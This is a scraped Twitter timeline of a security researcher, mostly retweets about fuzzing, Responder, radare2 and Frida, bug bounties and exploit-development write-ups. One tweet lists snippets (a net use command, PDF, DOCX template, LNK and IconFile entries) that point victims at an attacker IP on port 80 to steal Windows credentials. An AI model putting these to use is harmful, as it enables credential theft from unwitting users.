Tweetovi

Blokirali ste korisnika/cu @metalamin

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @metalamin

  1. 5. velj

    Para añadir mi granito de arena a la charla de en la sobre NFC. Mirad que monada de emulador de tarjetas! Se lo recomiendo a todos

    Poništi
  2. 5. velj

    Received the new toy! Y so smol and sexy? <3

    Poništi
  3. proslijedio/la je Tweet
    30. sij

    Do you know ? It brings interesting add-ons to AFL. used it during his fuzzing research to create custom instrumentation whitelists, increasing AFL code coverage

    Poništi
  4. proslijedio/la je Tweet
    9. sij

    Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fix, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)

    Poništi
  5. proslijedio/la je Tweet
    11. stu 2019.
    Poništi
  6. proslijedio/la je Tweet
    20. ruj 2019.

    Super useful tool and oh boy, these improvements 💕

    Poništi
  7. proslijedio/la je Tweet
    14. ruj 2019.

    Happy to give away the material of the advanced training "Mobile Reverse Engineering with R2frida" to for his blog post "Dynamic Instrumentation: Frida and for Noobs". Keep up the great work mate! Contact any of the trainers for the link :)

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    10. ruj 2019.

    You can now learn r2 with the interactive r2golf plugin. The gamification is happening! r2pm -i r2golf

    Poništi
  9. proslijedio/la je Tweet
    10. ruj 2019.

    The first time I got stuck in vim

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    3. ruj 2019.

    I’ve decided to write up one of the iOS exploits in a new series, walking through each step of the underlying exploit development process. Hope these post will be more accessible for ppl trying to learn exploit dev and understand how exploit devs think.

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    30. lip 2019.

    Next, next, next gen endpoint protection.

    Poništi
  12. proslijedio/la je Tweet
    20. lip 2019.
    Odgovor korisniku/ci

    Gracias a vosotros por organizarlo, a mis compis del equipo Crainers y al resto de participantes. El año que viene más!🤙

    Poništi
  13. proslijedio/la je Tweet
    13. lip 2019.

    Short blog and POC code for CVE-2019-1040 (patched last Tuesday). Combining this vulnerability with the SpoolService bug and Kerberos delegation means: any AD user to Domain Admin; RCE on unpatched hosts; possible over Forest trusts. TL;DR: GO PATCH!

    Poništi
  14. proslijedio/la je Tweet
    30. tra 2019.

    Did know that u can steal by changing port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico cc

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    28. sij 2019.

    Congrats to for receiving a 140k bounty from Samsung. Details will be presented at this year.

    Poništi
  16. proslijedio/la je Tweet

    POS updating over HTTP right in time to be caught by me 💃

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    13. sij 2019.

    Thanks to for coming last night to share his quest to pwn the North Korean content validation framework. Code at

    Poništi
  18. proslijedio/la je Tweet
    26. stu 2018.

    Smart Greybox Fuzzing paper is now available on Arxiv . Key idea: structural and bit-level mutations go hand in hand with a format validity based power schedule. 42 bugs found, 17 CVEs assigned in FFmpeg, LibAV, LibPNG, OpenJPEG, Binutils...

    Poništi
  19. proslijedio/la je Tweet
    10. stu 2018.

    LiveOverflow marketing strategy: Gain viewers with clickbait videos, trick them into learning something technical while watching it, and then bind them with actual technical videos once they explore the channel 🙃

    Poništi
  20. proslijedio/la je Tweet
    1. stu 2018.

    kudima() submitted another Webkit RCE exploit to the repository! He wrote the entire exploit along with a very detailed annotation, which works up to iOS 12.0.1. Thanks again for the contribution! 😄

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·